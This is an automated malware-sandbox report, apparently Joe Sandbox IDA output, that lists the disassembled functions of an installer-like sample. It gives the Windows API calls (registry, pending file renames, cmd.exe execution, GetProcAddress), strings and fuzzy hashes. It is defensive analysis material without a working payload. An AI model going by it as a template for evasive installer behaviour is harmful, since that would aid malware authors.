                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                                                      • API String ID: 1375471231-1421604804
                                                                                                      • Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                                                      • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                                                                      • Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                                                      • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                                                                      Function 00430950 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                      • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                      • API String ID: 4130936913-2943970505
                                                                                                      • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                                      • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                                                                      • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                                      • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                                                                      Function 004723E4 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 263fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                                                                      • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                                                                      • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFileNext
                                                                                                      • String ID: "*G$"*G
                                                                                                      • API String ID: 2066263336-450946878
                                                                                                      • Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                                                      • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                                                                      • Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                                                      • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                                                                      Function 00454FFC Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                                                                      • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                                                                        • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                                        • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                                        • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                                        • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                      • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                      • API String ID: 854858120-615399546
                                                                                                      • Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                                                      • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                                                                      • Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                                                      • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                                                                      Function 0042369C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                      • OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                      • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$FileIconLoadLowerModuleName
                                                                                                      • String ID: 2$MAINICON
                                                                                                      • API String ID: 3935243913-3181700818
                                                                                                      • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                                      • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                                                                      • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                                                      • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                                                                      Function 00418F48 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                                                      • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                                                        • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                                                        • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                                                        • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                                                        • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                                                        • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                                                        • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                                                        • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                                                        • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                                                        • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                        • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                        • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                        • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                        • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                                                      • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                      • API String ID: 3476490787-2767913252
                                                                                                      • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                                      • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                                                                      • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                                                      • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                                                                      Function 0041364C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LongWindow$Prop
                                                                                                      • String ID:
                                                                                                      • API String ID: 3887896539-0
                                                                                                      • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                                      • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                                                                      • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                                      • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                                                                      Function 004556C4 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                                                                      Strings
                                                                                                      • PendingFileRenameOperations, xrefs: 00455740
                                                                                                      • WININIT.INI, xrefs: 004557D0
                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                                                                      • PendingFileRenameOperations2, xrefs: 00455770
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                      • API String ID: 47109696-2199428270
                                                                                                      • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                                      • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                                                      • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                                                      • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                                                                      Function 00423A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                      • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                      • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnumLongWindows
                                                                                                      • String ID: lAB
                                                                                                      • API String ID: 4191631535-3476862382
                                                                                                      • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                                      • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
                                                                                                      • Opcode Fuzzy Hash: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                                                      • Instruction Fuzzy Hash: 4E115E70700610ABDB109F28DD85F6A77E8EB04725F50026AF9A49B2E7C378ED40CB59
                                                                                                      Function 0042DE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressDeleteHandleModuleProc
                                                                                                      • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                      • API String ID: 588496660-1846899949
                                                                                                      • Opcode ID: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                                                      • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                                                                      • Opcode Fuzzy Hash: 1efadd4f9f0c0ea65d6d931b2dfdd832bea74e7cc2ac9dff72f3f3dd5b00937e
                                                                                                      • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                                                                      Function 0046BE48 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 276COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      • NextButtonClick, xrefs: 0046BF84
                                                                                                      • Need to restart Windows? %s, xrefs: 0046C172
                                                                                                      • PrepareToInstall failed: %s, xrefs: 0046C14B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                                      • API String ID: 0-2329492092
                                                                                                      • Opcode ID: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                                                      • Instruction ID: 1202268df95ceb0eead913a0caf14b6b564ec17a2e6689a58d7256d675820d07
                                                                                                      • Opcode Fuzzy Hash: 221dd23b7cfc17f66ca7de120067e16c15a7d044e53f2a8722f04dc11adac0dc
                                                                                                      • Instruction Fuzzy Hash: 64C16D34A04208DFCB00DB98C9D5AEE77B5EF05304F1444B7E840AB362D778AE41DBAA
                                                                                                      Function 00482B0C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 224COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?,?,00000000,00482E54), ref: 00482C30
                                                                                                      • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00482CC5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveChangeNotifyWindow
                                                                                                      • String ID: $Need to restart Windows? %s
                                                                                                      • API String ID: 1160245247-4200181552
                                                                                                      • Opcode ID: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                                      • Instruction ID: 8ca071c16d970d9f92bb59f1fa37784b4b8a51c549d6f2244aaf7164950ab745
                                                                                                      • Opcode Fuzzy Hash: 42b6435f46a46e58fbbfcf74279f1aaa99ef9f12c59d4801a02600e2121285e9
                                                                                                      • Instruction Fuzzy Hash: 2191B4346042458FDB10EB69D9C5BAD77F4AF59308F0084BBE8009B3A2CBB8AD05CB5D
                                                                                                      Function 0046FD84 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                      • GetLastError.KERNEL32(00000000,0046FF81,?,?,0049C1D0,00000000), ref: 0046FE5E
                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FED8
                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FEFD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
